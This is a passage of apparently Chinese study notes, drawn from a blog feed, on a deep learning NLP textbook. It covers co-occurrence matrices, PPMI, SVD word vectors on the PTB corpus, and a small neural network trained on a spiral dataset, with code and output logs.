    left_word_id = corpus[left_idx]
    co_matrix[word_id, left_word_id] += 1

    if right_idx < corpus_size:
    right_word_id = corpus[right_idx]
    co_matrix[word_id, right_word_id] += 1
    return co_matrix

    2.3.5 向量间的相似度

    余弦相似度(cosine similarity)。设有 $x=(x_1,x_2,x_3,…,x_n)$ 和 $y=(y_1,y_2,y_3,…,y_n)$ 两个向量,它们之间的余弦相似度定义如下:

    $$\mathrm{similarity}(x,y)=\frac{x\cdot y}{||x||\ ||y||}\frac{x_1y_1+…+x_ny_n}{\sqrt{x2_1+…+x2_n}\sqrt{y2_1+…+y2_n}}$$

    1
    2
    3
    4
    def cos_similarity(x, y):
    nx = x / np.sqrt(np.sum(x ** 2)) # x 的正规化
    ny = y / np.sqrt(np.sum(y ** 2)) # y 的正规化
    return np.dot(nx, ny)

    这里当零向量(元素全部为 0 的向量)被赋值给参数时,会出现“除数为 0”(zero division)的错误。

    通过参数指定一个微小值 eps(eps 是 epsilon 的缩写),并默认 eps=1e-8(= 0.000 000 01)以防止“除数为 0”的错误。

    1
    2
    3
    4
    def cos_similarity(x, y, eps=1e-8):
    nx = x / (np.sqrt(np.sum(x ** 2)) + eps)
    ny = y / (np.sqrt(np.sum(y ** 2)) + eps)
    return np.dot(nx, ny)

    youi(= I)的相似度:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    import sys
    sys.path.append('..')
    from common.util import preprocess, create_co_matrix, cos_similarity

    text = 'You say goodbye and I say hello.'
    corpus, word_to_id, id_to_word = preprocess(text)
    vocab_size = len(word_to_id)
    C = create_co_matrix(corpus, vocab_size)
    c0 = C[word_to_id['you']] # you 的单词向量
    c1 = C[word_to_id['i']] # i 的单词向量
    print(cos_similarity(c0, c1))
    0.7071067691154799

    2.3.6 相似单词的排序

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    def most_similar(query, word_to_id, id_to_word, word_matrix, top=5):
    """
    当某个单词被作为查询词时,将与这个查询词相似的单词按降序显示出来。
    """
    # 1. 取出查询词
    if query not in word_to_id:
    print('%s is not found' % query)
    return
    print('\n[query] ' + query)
    query_id = word_to_id[query]
    query_vec = word_matrix[query_id]

    # 2. 计算余弦相似度
    vocab_size = len(id_to_word)
    similarity = np.zeros(vocab_size)
    for i in range(vocab_size):
    similarity[i] = cos_similarity(word_matrix[i], query_vec)

    # 3. 基于余弦相似度,按降序输出值
    count = 0
    # argsort() 方法可以按升序对 NumPy 数组的元素进行排序(不过,返回值是数组的索引)
    for i in (-1 * similarity).argsort():
    if id_to_word[i] == query:
    continue
    print(' %s: %s' % (id_to_word[i], similarity[i]))

    count += 1
    if count >= top:
    return

    试着使用一下。这里将 you 作为查询词,显示与其相似的单词。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    import sys
    sys.path.append('..')
    from common.util import preprocess, create_co_matrix, most_similar

    text = 'You say goodbye and I say hello.'
    corpus, word_to_id, id_to_word = preprocess(text)
    vocab_size = len(word_to_id)
    C = create_co_matrix(corpus, vocab_size)

    most_similar('you', word_to_id, id_to_word, C, top=5)
    [query] you goodbye: 0.7071067691154799 i: 0.7071067691154799 hello: 0.7071067691154799 say: 0.0 and: 0.0

    2.4 基于计数的方法的改进

    2.4.1 点互信息

    如果只看单词的出现次数,那么与 drive 相比,the 和 car 的相关性更强。这意味着,仅仅因为 the 是个常用词,它就被认为与 car 有很强的相关性。

    点互消息(Pointwise Mutual Information, PMI)。对于随机变量 $x$ 和 $y$,它们的 PMI 定义如下:

    $$\mathrm{PMI}(x,y)=\log_2\frac{P(x,y)}{P(x)P(y)}$$

    $P(x)$ 表示 $x$ 发生的概率,$P(y)$ 表示 $y$ 发生的概率,$P(x, y)$ 表示 $x$ 和 $y$ 同时发生的概率。PMI 的值越高,表明相关性越强。

    在自然语言的例子中,$P(x)$ 就是指单词 $x$ 在语料库中出现的概率。假设某个语料库中有 10 000 个单词,其中单词 the 出现了 100 次,则$P(“\mathrm{the}”)=\frac{100}{10000}=0.01$ 另外,$P(x, y)$ 表示单词 $x$ 和 $y$ 同时出现的概率。假设 thecar 一起出现了 10 次,则$P(“\mathrm{the}”,“\mathrm{car}”)=\frac{100}{10000}=0.01$。

    共现矩阵表示为 $C$,将单词 $x$ 和 $y$ 的共现次数表示为 $C(x, y)$,将单词 $x$ 和 $y$ 的出现次数分别表示为 $C(x)$、$C(y)$,将语料库的单词数量记为 $N$,则:

    $$\mathrm{PMI}(x,y)=\log_2\frac{P(x,y)}{P(x)P(y)}=\log_2\frac{\frac{C(x,y)}{N}}{\frac{C(x)}{N}\frac{C(y)}{N}}=\log_2\frac{C(x,y)\cdot N}{C(x)C(y)}$$

    在使用 PMI 的情况下,与 the 相比,drive 和 car 具有更强的相关性。这是我们想要的结果。之所以出现这个结果,是因为我们考虑了单词单独出现的次数。在这个例子中,因为 the 本身出现得多,所以 PMI 的得分被拉低了。式中的“≈”(near equal)表示近似相等的意思。

    PMI 的问题:当两个单词的共现次数为 0 时,$\log_2 0=-\infty$。为了解决这个问题,实践上我们会使用下述正的点互信息(Positive PMI,PPMI)

    $$\mathrm{PPMI}(x,y)=\max(0,\mathrm{PMI}(x,y))$$

    PMI 是负数时,将其视为 0,这样就可以将单词间的相关性表示为大于等于 0 的实数。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    def ppmi(C, verbose=False, eps=1e-8):
    """
    erbose: 决定是否输出运行情况的标志。
    当处理大语料库时,设置 verbose=True,可以用于确认运行情况
    为了防止 np.log2(0)=-inf 而使用了微小值 eps
    """
    M = np.zeros_like(C, dtype=np.float32)
    N = np.sum(C)
    S = np.sum(C, axis=0)
    total = C.shape[0] * C.shape[1]
    cnt = 0
    for i in range(C.shape[0]):
    for j in range(C.shape[1]):
    pmi = np.log2(C[i, j] * N / (S[j]*S[i]) + eps)
    M[i, j] = max(0, pmi)
    if verbose:
    cnt += 1
    if cnt % (total//100+1) == 0:
    print('%.1f%% done' % (100*cnt/total))
    return M

    将共现矩阵转化为 PPMI 矩阵:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    import sys
    sys.path.append('..')
    import numpy as np
    from common.util import preprocess, create_co_matrix, cos_similarity, ppmi

    text = 'You say goodbye and I say hello.'
    corpus, word_to_id, id_to_word = preprocess(text)
    vocab_size = len(word_to_id)
    C = create_co_matrix(corpus, vocab_size)
    W = ppmi(C)
    np.set_printoptions(precision=3) # 有效位数为 3 位

    print('covariance matrix')
    print(C)
    print('-'*50)
    print('PPMI')
    print(W)
    covariance matrix[[0 1 0 0 0 0 0] [1 0 1 0 1 1 0] [0 1 0 1 0 0 0] [0 0 1 0 1 0 0] [0 1 0 1 0 0 0] [0 1 0 0 0 0 1] [0 0 0 0 0 1 0]]--------------------------------------------------PPMI[[0.    1.807 0.    0.    0.    0.    0.   ] [1.807 0.    0.807 0.    0.807 0.807 0.   ] [0.    0.807 0.    1.807 0.    0.    0.   ] [0.    0.    1.807 0.    1.807 0.    0.   ] [0.    0.807 0.    1.807 0.    0.    0.   ] [0.    0.807 0.    0.    0.    0.    2.807] [0.    0.    0.    0.    0.    2.807 0.   ]]

    PPMI 矩阵的问题:随着语料库的词汇量增加,各个单词向量的维数也会增加。

    2.4.2 降维

    在尽量保留“重要信息”的基础上减少向量维度。

    png

    奇异值分解(Singular Value Decomposition,SVD)。SVD 将任意矩阵分解为 3 个矩阵的乘积:

    $$X=USV^T$$

    SVD 将任意的矩阵 $X$ 分解为 $U、S、V$ 这 3 个矩阵的乘积,其中 $U$ 和 $V$ 是列向量彼此正交的正交矩阵,$S$ 是除了对角线元素以外其余元素均为 0 的对角矩阵。

    2.4.3 基于 SVD 的降维

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    import sys
    sys.path.append('..')
    import numpy as np
    import matplotlib.pyplot as plt
    from common.util import preprocess, create_co_matrix, ppmi

    text = 'You say goodbye and I say hello.'
    corpus, word_to_id, id_to_word = preprocess(text)
    vocab_size = len(id_to_word)
    C = create_co_matrix(corpus, vocab_size, window_size=1)
    W = ppmi(C)

    # SVD
    U, S, V = np.linalg.svd(W)
    1
    print(C[0])  # 共现矩阵
    [0 1 0 0 0 0 0]
    1
    print(W[0]) # PPMI 矩阵
    [0.    1.807 0.    0.    0.    0.    0.   ]
    1
    print(U[0]) # SVD
    [-3.409e-01 -1.110e-16 -3.886e-16 -1.205e-01  0.000e+00  9.323e-01  2.226e-16]

    原先的稀疏向量 $W[0]$ 经过 SVD 被转化成了密集向量 $U[0]$

    1
    2
    3
    4
    for word, word_id in word_to_id.items():
    plt.annotate(word, (U[word_id, 0], U[word_id, 1]))
    plt.scatter(U[:,0], U[:,1], alpha=0.5)
    plt.show()


    png

    goodbyehelloyoui 位置接近,这是比较符合我们的直觉的。

    如果矩阵大小是 N,SVD 的计算的复杂度将达到 O(N3)。这意味着 SVD 需要与 N 的立方成比例的计算量。因为现实中这样的计算量是做不到的,所以往往会使用 Truncated SVD 等更快的方法。

    2.4.4 PTB 数据集

    我们使用的 PTB 语料库在 word2vec 的发明者托马斯· 米科洛夫(Tomas Mikolov)的网页上有提供。这个 PTB 语料库是以文本文件的形式提供的,与原始的 PTB 的文章相比,多了若干预处理,包括将稀有单词替换成特殊字符(unk 是 unknown 的简称),将具体的数字替换成“N”等。

    PTB 下载地址:http://www.fit.vutbr.cz/~imikolov/rnnlm/simple-examples.tgz

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    import sys
    sys.path.append('..')
    from dataset import ptb

    corpus, word_to_id, id_to_word = ptb.load_data('train')
    print('corpus size:', len(corpus))
    print('corpus[:30]:', corpus[:30])
    print()
    print('id_to_word[0]:', id_to_word[0])
    print('id_to_word[1]:', id_to_word[1])
    print('id_to_word[2]:', id_to_word[2])
    print()
    print("word_to_id['car']:", word_to_id['car'])
    print("word_to_id['happy']:", word_to_id['happy'])
    print("word_to_id['lexus']:", word_to_id['lexus'])
    corpus size: 929589corpus[:30]: [ 0  1  2  3  4  5  6  7  8  9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29]id_to_word[0]: aerid_to_word[1]: banknoteid_to_word[2]: berlitzword_to_id['car']: 3856word_to_id['happy']: 4428word_to_id['lexus']: 7426

    2.4.5 基于 PTB 数据集的评价

    这里建议使用更快速的 SVD 对大矩阵执行 SVD,为此我们需要安装 sklearn 模块。当然,虽然仍可以使用基本版的 SVD(np.linalg.svd()),但是这需要更多的时间和内存。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    import sys
    sys.path.append('..')
    import numpy as np
    from common.util import most_similar, create_co_matrix, ppmi
    from dataset import ptb

    window_size = 2
    wordvec_size = 100
    corpus, word_to_id, id_to_word = ptb.load_data('train')
    vocab_size = len(word_to_id)
    print('counting co-occurrence ...')
    C = create_co_matrix(corpus, vocab_size, window_size)
    print('calculating PPMI ...')
    W = ppmi(C, verbose=True)

    print('calculating SVD ...')
    try:
    # truncated SVD (fast!)
    from sklearn.utils.extmath import randomized_svd
    U, S, V = randomized_svd(W, n_components=wordvec_size, n_iter=5, random_state=None)
    excerpt ImportError:
    # SVD (slow)
    U, S, V = np.linalg.svd(W)

    word_vecs = U[:, :wordvec_size]
    querys = ['you', 'year', 'car', 'toyota']
    for query in querys:
    most_similar(query, word_to_id, id_to_word, word_vecs, top=5)
    counting co-occurrence ...calculating PPMI ...C:\Users\gzjzx\Jupyter\DL_Advanced\..\common\util.py:139: RuntimeWarning: overflow encountered in long_scalars  pmi = np.log2(C[i, j] * N / (S[j]*S[i]) + eps)C:\Users\gzjzx\Jupyter\DL_Advanced\..\common\util.py:139: RuntimeWarning: invalid value encountered in log2  pmi = np.log2(C[i, j] * N / (S[j]*S[i]) + eps)1.0% done2.0% done3.0% done4.0% done5.0% done6.0% done7.0% done8.0% done9.0% done10.0% done11.0% done12.0% done13.0% done14.0% done15.0% done16.0% done17.0% done18.0% done19.0% done20.0% done21.0% done22.0% done23.0% done24.0% done25.0% done26.0% done27.0% done28.0% done29.0% done30.0% done31.0% done32.0% done33.0% done34.0% done35.0% done36.0% done37.0% done38.0% done39.0% done40.0% done41.0% done42.0% done43.0% done44.0% done45.0% done46.0% done47.0% done48.0% done49.0% done50.0% done51.0% done52.0% done53.0% done54.0% done55.0% done56.0% done57.0% done58.0% done59.0% done60.0% done61.0% done62.0% done63.0% done64.0% done65.0% done66.0% done67.0% done68.0% done69.0% done70.0% done71.0% done72.0% done73.0% done74.0% done75.0% done76.0% done77.0% done78.0% done79.0% done80.0% done81.0% done82.0% done83.0% done84.0% done85.0% done86.0% done87.0% done88.0% done89.0% done90.0% done91.0% done92.0% done93.0% done94.0% done95.0% done96.0% done97.0% done98.0% done99.0% donecalculating SVD ...[query] you i: 0.6670734286308289 we: 0.6116090416908264 someone: 0.549290657043457 do: 0.5428591370582581 'll: 0.5290063619613647[query] year month: 0.6682149171829224 quarter: 0.6562734246253967 next: 0.6095362305641174 fiscal: 0.5867708921432495 earlier: 0.5734390616416931[query] car luxury: 0.6188714504241943 auto: 0.6056600213050842 corsica: 0.5616344809532166 domestic: 0.5556454062461853 cars: 0.521730363368988[query] toyota motor: 0.7244030237197876 motors: 0.6643518209457397 nissan: 0.6601378917694092 lexus: 0.6493816375732422 honda: 0.6213896870613098

    成功地将单词含义编码成了向量,真是可喜可贺!使用语料库,计算上下文中的单词数量,将它们转化 PPMI 矩阵,再基于 SVD 降维获得好的单词向量。这就是单词的分布式表示,每个单词表示为固定长度的密集向量。

    2.5 小结

    • 使用 WordNet 等同义词词典,可以获取近义词或测量单词间的相似度等

    • 使用同义词词典的方法存在创建词库需要大量人力、新词难更新等问题

    • 目前,使用语料库对单词进行向量化是主流方法

    • 近年来的单词向量化方法大多基于“单词含义由其周围的单词构成”这一分布式假设

    • 在基于计数的方法中,对语料库中的每个单词周围的单词的出现频数进行计数并汇总(= 共现矩阵)

    • 通过将共现矩阵转化为 PPMI 矩阵并降维,可以将大的稀疏向量转变为小的密集向量

    • 在单词的向量空间中,含义上接近的单词距离上理应也更近

    ]]>
    @@ -8036,7 +8036,7 @@ /posts/DL-%E6%B7%B1%E5%BA%A6%E5%AD%A6%E4%B9%A0%E8%BF%9B%E9%98%B6-%E8%87%AA%E7%84%B6%E8%AF%AD%E8%A8%80%E5%A4%84%E7%90%86-1-%E7%A5%9E%E7%BB%8F%E7%BD%91%E7%BB%9C%E7%9A%84%E5%A4%8D%E4%B9%A0/ - 正文

    1.4 使用神经网络解决问题

    1.4.1 螺旋状数据集

    import sys
    sys.path.append('..') # 为了引入父目录的文件而进行的设定
    from dataset import spiral
    import matplotlib.pyplot as plt

    x, t = spiral.load_data()
    print('x', x.shape) # (300, 2)
    print('t', t.shape) # (300, 3)
    x (300, 2)t (300, 3)
    # 绘制数据点
    N = 100
    CLS_NUM = 3
    markers = ['o', 'x', '^']
    for i in range(CLS_NUM):
    plt.scatter(x[i * N:(i + 1) * N, 0], x[i * N: (i + 1) * N, 1], s=40, marker=markers[i])
    plt.show()

    png

    1.4.2 神经网络的实现

    import sys
    sys.path.append('..')
    import numpy as np
    from common.layers import Affine, Sigmoid, SoftmaxWithLoss


    class TwoLayerNet:
    def __init__(self, input_size, hidden_size, output_size):
    I, H, O = input_size, hidden_size, output_size
    # 初始化权重和偏置
    W1 = 0.01 * np.random.randn(I, H)
    b1 = np.zeros(H)
    W2 = 0.01 * np.random.randn(H, O)
    b2 = np.zeros(O)
    # 生成层
    self.layers = [Affine(W1, b1), Sigmoid(), Affine(W2, b2)]
    self.loss_layer = SoftmaxWithLoss()
    # 将所有的权重和梯度整理到列表中
    self.params, self.grads = [], []
    for layer in self.layers:
    self.params += layer.params
    self.grads += layer.grads


    def predict(self, x):
    for layer in self.layers:
    x = layer.forward(x)
    return x


    def forward(self, x, t):
    score = self.predict(x)
    loss = self.loss_layer.forward(score, t)
    return loss


    def backward(self, dout=1):
    dout = self.loss_layer.backward(dout)
    for layer in reversed(self.layers):
    dout = layer.backward(dout)
    return dout

    1.4.3 学习用的代码

    import sys
    sys.path.append('..') # 为了引入父目录的文件而进行的设定
    import numpy as np
    from common.optimizer import SGD
    from dataset import spiral
    import matplotlib.pyplot as plt

    # 设定超参数
    max_epoch = 300
    batch_size = 30
    hidden_size = 10
    learning_rate = 1.0

    x, t = spiral.load_data()
    model = TwoLayerNet(input_size=2, hidden_size=hidden_size, output_size=3)
    optimizer = SGD(lr=learning_rate)

    # 学习用的变量
    data_size = len(x)
    max_iters = data_size // batch_size
    total_loss = 0
    loss_count = 0
    loss_list = []

    for epoch in range(max_epoch):
    """
    在进行学习时,需要随机选择数据作为 mini-batch。
    """
    # 打乱数据 使用 np.random.permutation() 方法。给定参数 N,该方法可以返回 0 到 N − 1 的随机序列。
    idx = np.random.permutation(data_size)
    x = x[idx]
    t = t[idx]

    for iters in range(max_iters):
    batch_x = x[iters*batch_size:(iters+1)*batch_size]
    batch_t = t[iters*batch_size:(iters+1)*batch_size]

    # 计算梯度,更新参数
    loss = model.forward(batch_x, batch_t)
    model.backward()
    optimizer.update(model.params, model.grads)

    total_loss += loss
    loss_count += 1

    # 定期输出学习过程
    if (iters+1) % 10 == 0:
    avg_loss = total_loss / loss_count
    print('| epoch %d | iter %d / %d | loss %.2f'
    % (epoch + 1, iters + 1, max_iters, avg_loss))
    loss_list.append(avg_loss)
    total_loss, loss_count = 0, 0
    | epoch 1 |  iter 10 / 10 | loss 1.13| epoch 2 |  iter 10 / 10 | loss 1.13| epoch 3 |  iter 10 / 10 | loss 1.12| epoch 4 |  iter 10 / 10 | loss 1.12| epoch 5 |  iter 10 / 10 | loss 1.11| epoch 6 |  iter 10 / 10 | loss 1.14| epoch 7 |  iter 10 / 10 | loss 1.16| epoch 8 |  iter 10 / 10 | loss 1.11| epoch 9 |  iter 10 / 10 | loss 1.12| epoch 10 |  iter 10 / 10 | loss 1.13| epoch 11 |  iter 10 / 10 | loss 1.12| epoch 12 |  iter 10 / 10 | loss 1.11| epoch 13 |  iter 10 / 10 | loss 1.09| epoch 14 |  iter 10 / 10 | loss 1.08| epoch 15 |  iter 10 / 10 | loss 1.04| epoch 16 |  iter 10 / 10 | loss 1.03| epoch 17 |  iter 10 / 10 | loss 0.96| epoch 18 |  iter 10 / 10 | loss 0.92| epoch 19 |  iter 10 / 10 | loss 0.92| epoch 20 |  iter 10 / 10 | loss 0.87| epoch 21 |  iter 10 / 10 | loss 0.85| epoch 22 |  iter 10 / 10 | loss 0.82| epoch 23 |  iter 10 / 10 | loss 0.79| epoch 24 |  iter 10 / 10 | loss 0.78| epoch 25 |  iter 10 / 10 | loss 0.82| epoch 26 |  iter 10 / 10 | loss 0.78| epoch 27 |  iter 10 / 10 | loss 0.76| epoch 28 |  iter 10 / 10 | loss 0.76| epoch 29 |  iter 10 / 10 | loss 0.78| epoch 30 |  iter 10 / 10 | loss 0.75| epoch 31 |  iter 10 / 10 | loss 0.78| epoch 32 |  iter 10 / 10 | loss 0.77| epoch 33 |  iter 10 / 10 | loss 0.77| epoch 34 |  iter 10 / 10 | loss 0.78| epoch 35 |  iter 10 / 10 | loss 0.75| epoch 36 |  iter 10 / 10 | loss 0.74| epoch 37 |  iter 10 / 10 | loss 0.76| epoch 38 |  iter 10 / 10 | loss 0.76| epoch 39 |  iter 10 / 10 | loss 0.73| epoch 40 |  iter 10 / 10 | loss 0.75| epoch 41 |  iter 10 / 10 | loss 0.76| epoch 42 |  iter 10 / 10 | loss 0.76| epoch 43 |  iter 10 / 10 | loss 0.76| epoch 44 |  iter 10 / 10 | loss 0.74| epoch 45 |  iter 10 / 10 | loss 0.75| epoch 46 |  iter 10 / 10 | loss 0.73| epoch 47 |  iter 10 / 10 | loss 0.72| epoch 48 |  iter 10 / 10 | loss 0.73| epoch 49 |  iter 10 / 10 | loss 0.72| epoch 50 |  iter 10 / 10 | loss 0.72| epoch 51 |  iter 10 / 10 | loss 0.72| epoch 52 |  iter 10 / 10 | loss 0.72| epoch 53 |  iter 10 / 10 | loss 0.74| epoch 54 |  iter 10 / 10 | loss 0.74| epoch 55 |  iter 10 / 10 | loss 0.72| epoch 56 |  iter 10 / 10 | loss 0.72| epoch 57 |  iter 10 / 10 | loss 0.71| epoch 58 |  iter 10 / 10 | loss 0.70| epoch 59 |  iter 10 / 10 | loss 0.72| epoch 60 |  iter 10 / 10 | loss 0.70| epoch 61 |  iter 10 / 10 | loss 0.71| epoch 62 |  iter 10 / 10 | loss 0.72| epoch 63 |  iter 10 / 10 | loss 0.70| epoch 64 |  iter 10 / 10 | loss 0.71| epoch 65 |  iter 10 / 10 | loss 0.73| epoch 66 |  iter 10 / 10 | loss 0.70| epoch 67 |  iter 10 / 10 | loss 0.71| epoch 68 |  iter 10 / 10 | loss 0.69| epoch 69 |  iter 10 / 10 | loss 0.70| epoch 70 |  iter 10 / 10 | loss 0.71| epoch 71 |  iter 10 / 10 | loss 0.68| epoch 72 |  iter 10 / 10 | loss 0.69| epoch 73 |  iter 10 / 10 | loss 0.67| epoch 74 |  iter 10 / 10 | loss 0.68| epoch 75 |  iter 10 / 10 | loss 0.67| epoch 76 |  iter 10 / 10 | loss 0.66| epoch 77 |  iter 10 / 10 | loss 0.69| epoch 78 |  iter 10 / 10 | loss 0.64| epoch 79 |  iter 10 / 10 | loss 0.68| epoch 80 |  iter 10 / 10 | loss 0.64| epoch 81 |  iter 10 / 10 | loss 0.64| epoch 82 |  iter 10 / 10 | loss 0.66| epoch 83 |  iter 10 / 10 | loss 0.62| epoch 84 |  iter 10 / 10 | loss 0.62| epoch 85 |  iter 10 / 10 | loss 0.61| epoch 86 |  iter 10 / 10 | loss 0.60| epoch 87 |  iter 10 / 10 | loss 0.60| epoch 88 |  iter 10 / 10 | loss 0.61| epoch 89 |  iter 10 / 10 | loss 0.59| epoch 90 |  iter 10 / 10 | loss 0.58| epoch 91 |  iter 10 / 10 | loss 0.56| epoch 92 |  iter 10 / 10 | loss 0.56| epoch 93 |  iter 10 / 10 | loss 0.54| epoch 94 |  iter 10 / 10 | loss 0.53| epoch 95 |  iter 10 / 10 | loss 0.53| epoch 96 |  iter 10 / 10 | loss 0.52| epoch 97 |  iter 10 / 10 | loss 0.51| epoch 98 |  iter 10 / 10 | loss 0.50| epoch 99 |  iter 10 / 10 | loss 0.48| epoch 100 |  iter 10 / 10 | loss 0.48| epoch 101 |  iter 10 / 10 | loss 0.46| epoch 102 |  iter 10 / 10 | loss 0.45| epoch 103 |  iter 10 / 10 | loss 0.45| epoch 104 |  iter 10 / 10 | loss 0.44| epoch 105 |  iter 10 / 10 | loss 0.44| epoch 106 |  iter 10 / 10 | loss 0.41| epoch 107 |  iter 10 / 10 | loss 0.40| epoch 108 |  iter 10 / 10 | loss 0.41| epoch 109 |  iter 10 / 10 | loss 0.40| epoch 110 |  iter 10 / 10 | loss 0.40| epoch 111 |  iter 10 / 10 | loss 0.38| epoch 112 |  iter 10 / 10 | loss 0.38| epoch 113 |  iter 10 / 10 | loss 0.36| epoch 114 |  iter 10 / 10 | loss 0.37| epoch 115 |  iter 10 / 10 | loss 0.35| epoch 116 |  iter 10 / 10 | loss 0.34| epoch 117 |  iter 10 / 10 | loss 0.34| epoch 118 |  iter 10 / 10 | loss 0.34| epoch 119 |  iter 10 / 10 | loss 0.33| epoch 120 |  iter 10 / 10 | loss 0.34| epoch 121 |  iter 10 / 10 | loss 0.32| epoch 122 |  iter 10 / 10 | loss 0.32| epoch 123 |  iter 10 / 10 | loss 0.31| epoch 124 |  iter 10 / 10 | loss 0.31| epoch 125 |  iter 10 / 10 | loss 0.30| epoch 126 |  iter 10 / 10 | loss 0.30| epoch 127 |  iter 10 / 10 | loss 0.28| epoch 128 |  iter 10 / 10 | loss 0.28| epoch 129 |  iter 10 / 10 | loss 0.28| epoch 130 |  iter 10 / 10 | loss 0.28| epoch 131 |  iter 10 / 10 | loss 0.27| epoch 132 |  iter 10 / 10 | loss 0.27| epoch 133 |  iter 10 / 10 | loss 0.27| epoch 134 |  iter 10 / 10 | loss 0.27| epoch 135 |  iter 10 / 10 | loss 0.27| epoch 136 |  iter 10 / 10 | loss 0.26| epoch 137 |  iter 10 / 10 | loss 0.26| epoch 138 |  iter 10 / 10 | loss 0.26| epoch 139 |  iter 10 / 10 | loss 0.25| epoch 140 |  iter 10 / 10 | loss 0.24| epoch 141 |  iter 10 / 10 | loss 0.24| epoch 142 |  iter 10 / 10 | loss 0.25| epoch 143 |  iter 10 / 10 | loss 0.24| epoch 144 |  iter 10 / 10 | loss 0.24| epoch 145 |  iter 10 / 10 | loss 0.23| epoch 146 |  iter 10 / 10 | loss 0.24| epoch 147 |  iter 10 / 10 | loss 0.23| epoch 148 |  iter 10 / 10 | loss 0.23| epoch 149 |  iter 10 / 10 | loss 0.22| epoch 150 |  iter 10 / 10 | loss 0.22| epoch 151 |  iter 10 / 10 | loss 0.22| epoch 152 |  iter 10 / 10 | loss 0.22| epoch 153 |  iter 10 / 10 | loss 0.22| epoch 154 |  iter 10 / 10 | loss 0.22| epoch 155 |  iter 10 / 10 | loss 0.22| epoch 156 |  iter 10 / 10 | loss 0.21| epoch 157 |  iter 10 / 10 | loss 0.21| epoch 158 |  iter 10 / 10 | loss 0.20| epoch 159 |  iter 10 / 10 | loss 0.21| epoch 160 |  iter 10 / 10 | loss 0.20| epoch 161 |  iter 10 / 10 | loss 0.20| epoch 162 |  iter 10 / 10 | loss 0.20| epoch 163 |  iter 10 / 10 | loss 0.21| epoch 164 |  iter 10 / 10 | loss 0.20| epoch 165 |  iter 10 / 10 | loss 0.20| epoch 166 |  iter 10 / 10 | loss 0.19| epoch 167 |  iter 10 / 10 | loss 0.19| epoch 168 |  iter 10 / 10 | loss 0.19| epoch 169 |  iter 10 / 10 | loss 0.19| epoch 170 |  iter 10 / 10 | loss 0.19| epoch 171 |  iter 10 / 10 | loss 0.19| epoch 172 |  iter 10 / 10 | loss 0.18| epoch 173 |  iter 10 / 10 | loss 0.18| epoch 174 |  iter 10 / 10 | loss 0.18| epoch 175 |  iter 10 / 10 | loss 0.18| epoch 176 |  iter 10 / 10 | loss 0.18| epoch 177 |  iter 10 / 10 | loss 0.18| epoch 178 |  iter 10 / 10 | loss 0.18| epoch 179 |  iter 10 / 10 | loss 0.17| epoch 180 |  iter 10 / 10 | loss 0.17| epoch 181 |  iter 10 / 10 | loss 0.18| epoch 182 |  iter 10 / 10 | loss 0.17| epoch 183 |  iter 10 / 10 | loss 0.18| epoch 184 |  iter 10 / 10 | loss 0.17| epoch 185 |  iter 10 / 10 | loss 0.17| epoch 186 |  iter 10 / 10 | loss 0.18| epoch 187 |  iter 10 / 10 | loss 0.17| epoch 188 |  iter 10 / 10 | loss 0.17| epoch 189 |  iter 10 / 10 | loss 0.17| epoch 190 |  iter 10 / 10 | loss 0.17| epoch 191 |  iter 10 / 10 | loss 0.16| epoch 192 |  iter 10 / 10 | loss 0.17| epoch 193 |  iter 10 / 10 | loss 0.16| epoch 194 |  iter 10 / 10 | loss 0.16| epoch 195 |  iter 10 / 10 | loss 0.16| epoch 196 |  iter 10 / 10 | loss 0.16| epoch 197 |  iter 10 / 10 | loss 0.16| epoch 198 |  iter 10 / 10 | loss 0.15| epoch 199 |  iter 10 / 10 | loss 0.16| epoch 200 |  iter 10 / 10 | loss 0.16| epoch 201 |  iter 10 / 10 | loss 0.15| epoch 202 |  iter 10 / 10 | loss 0.16| epoch 203 |  iter 10 / 10 | loss 0.16| epoch 204 |  iter 10 / 10 | loss 0.15| epoch 205 |  iter 10 / 10 | loss 0.16| epoch 206 |  iter 10 / 10 | loss 0.15| epoch 207 |  iter 10 / 10 | loss 0.15| epoch 208 |  iter 10 / 10 | loss 0.15| epoch 209 |  iter 10 / 10 | loss 0.15| epoch 210 |  iter 10 / 10 | loss 0.15| epoch 211 |  iter 10 / 10 | loss 0.15| epoch 212 |  iter 10 / 10 | loss 0.15| epoch 213 |  iter 10 / 10 | loss 0.15| epoch 214 |  iter 10 / 10 | loss 0.15| epoch 215 |  iter 10 / 10 | loss 0.15| epoch 216 |  iter 10 / 10 | loss 0.14| epoch 217 |  iter 10 / 10 | loss 0.14| epoch 218 |  iter 10 / 10 | loss 0.15| epoch 219 |  iter 10 / 10 | loss 0.14| epoch 220 |  iter 10 / 10 | loss 0.14| epoch 221 |  iter 10 / 10 | loss 0.14| epoch 222 |  iter 10 / 10 | loss 0.14| epoch 223 |  iter 10 / 10 | loss 0.14| epoch 224 |  iter 10 / 10 | loss 0.14| epoch 225 |  iter 10 / 10 | loss 0.14| epoch 226 |  iter 10 / 10 | loss 0.14| epoch 227 |  iter 10 / 10 | loss 0.14| epoch 228 |  iter 10 / 10 | loss 0.14| epoch 229 |  iter 10 / 10 | loss 0.13| epoch 230 |  iter 10 / 10 | loss 0.14| epoch 231 |  iter 10 / 10 | loss 0.13| epoch 232 |  iter 10 / 10 | loss 0.14| epoch 233 |  iter 10 / 10 | loss 0.13| epoch 234 |  iter 10 / 10 | loss 0.13| epoch 235 |  iter 10 / 10 | loss 0.13| epoch 236 |  iter 10 / 10 | loss 0.13| epoch 237 |  iter 10 / 10 | loss 0.14| epoch 238 |  iter 10 / 10 | loss 0.13| epoch 239 |  iter 10 / 10 | loss 0.13| epoch 240 |  iter 10 / 10 | loss 0.14| epoch 241 |  iter 10 / 10 | loss 0.13| epoch 242 |  iter 10 / 10 | loss 0.13| epoch 243 |  iter 10 / 10 